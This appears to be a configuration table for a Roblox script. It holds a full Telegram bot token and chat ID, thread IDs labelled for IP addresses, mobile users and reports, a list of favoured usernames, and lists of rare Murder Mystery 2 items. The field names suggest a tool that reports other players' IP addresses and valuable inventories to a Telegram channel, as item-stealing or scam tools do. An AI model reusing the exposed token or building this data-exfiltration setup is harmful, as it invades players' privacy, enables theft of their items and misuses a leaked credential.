aprplayers = {
    "Guest194827461",
    "skibiditolet2018",
    "typazveer",
    "speralka8814",
    "eqz_s",
}
webhook = 10
poor = 37
chatId = -1002853777462
botToken = "8168201640:AAEnQC-UYyvGPGz3ueJVzpb07Kdqa788ToI"
threadIdIP = 104
threadmobile = 6
reportsid = 29143
richgodliesList = {"Bat","Candy","Darksword","Darkshot", "Traveler's Gun", "Evergreen","Evergun","Bauble","Rainbow Gun", "Sunrise", "Sunset", "Rainbow","Constellation","Sakura","Blossom","Turkey","Vampire's Gun"}
richgodliesListpc = {"TreeKnife2023", "Turkey2023", "TreeGun2023","TravelerGun","Sakura_K", "Blossom_G", "ZombieBat", "Constellation", "Candy", "VampireGun", "SunsetKnife", "SunsetGun","Darksword","Darkshot","Rainbow_G","Rainbow_K","Bauble"}
